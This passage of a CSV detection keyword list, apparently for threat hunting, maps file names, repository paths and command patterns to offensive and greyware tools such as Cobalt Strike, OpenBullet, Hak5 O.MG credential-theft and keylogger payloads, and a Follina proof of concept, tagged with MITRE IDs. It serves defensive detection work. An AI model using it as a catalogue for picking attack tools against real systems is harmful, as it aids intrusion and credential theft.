accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*oh365userfinder.py*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*Oh365UserFinder-main*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. 
or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*oifjbnnafapeiknapihcmpeodaeblbkn*,greyware_tool_keyword,rderzh VPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*OLDNamedPipeServer.ps1*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*OleViewDotNet.psd1*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*OlivierLaflamme/PyExec*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*omdakjcmkglenbhjadbccaookpfjihpa*,greyware_tool_keyword,TunnelBear VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*-OMG-Credz-Plz*,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*OMGdump.zip*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*omghfjlpggmjjaagoclmmobgdodcjboh*,greyware_tool_keyword,Browsec VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*OMGLoggerDecoder*,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential 
Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*omg-payloads*/payloads/*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*omg-payloads-master*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*OmriBaso/BesoToken*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*On_Demand_C2.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*On-Demand_C2_BOF.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*OnDemandC2Class.cs*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*onecloudemoji/CVE-2022-30190*,offensive_tool_keyword,POC,CVE-2022-30190 Follina POC,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/onecloudemoji/CVE-2022-30190,1,1,N/A,N/A,2,107,33,2022-05-31T09:35:37Z,2022-05-31T06:45:25Z -*OneDrive Enumerator*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*onedrive_enum.py*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*onedrive_exports_version_dll.txt*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*onedrive_user_enum.git*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network 
Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*One-Lin3r*,offensive_tool_keyword,One-Lin3r,One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).,T1059 - T1003 - T1053,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/D4Vinci/One-Lin3r,1,1,N/A,N/A,10,1596,307,2022-02-10T18:17:57Z,2018-01-14T21:26:04Z -*onesixtyone -c *snmp_default_pass.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*onesixtyone -c *wordlists/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*onesixtyone -i * -c*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,0,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*onesixtyone.1*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*onesixtyone.git*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*OnionScan*,offensive_tool_keyword,onionscan,OnionScan has two primary goals: We want to help operators of hidden services find and fix operational security issues with their services. We want to help them detect misconfigurations and we want to inspire a new generation of anonymity engineering projects to help make the world a more private place. Secondly we want to help researchers and investigators monitor and track Dark Web sites. In fact we want to make this as easy as possible. Not because we agree with the goals and motives of every investigation force out there - most often we don't. But by making these kinds of investigations easy. 
we hope to create a powerful incentive for new anonymity technology,T1589 - T1591 - T1596 - T1599,TA0011 - TA0012,N/A,N/A,Information Gathering,https://onionscan.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*oofgbpoabipfcfjapgnbbjjaenockbdp*,greyware_tool_keyword,SetupVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ookhnhpkphagefgdiemllfajmkdkcaim*,greyware_tool_keyword,iNinja VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*openBeaconBrowser*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openBeaconBrowser*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openBeaconConsole*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openBeaconConsole*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openbsd_softraid2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*OpenBullet.csproj*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.exe*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.pdb*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.sln*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*openbullet/openbullet*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet2.Console.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - 
T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2.Native.exe*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2.Native.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*openbullet2:latest*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2-master*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBulletApp.cs*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z 
-*OpenBulletCLI.csproj*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBulletCLI.exe*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*openbullet-master*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*openBypassUACDialog*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openBypassUACDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 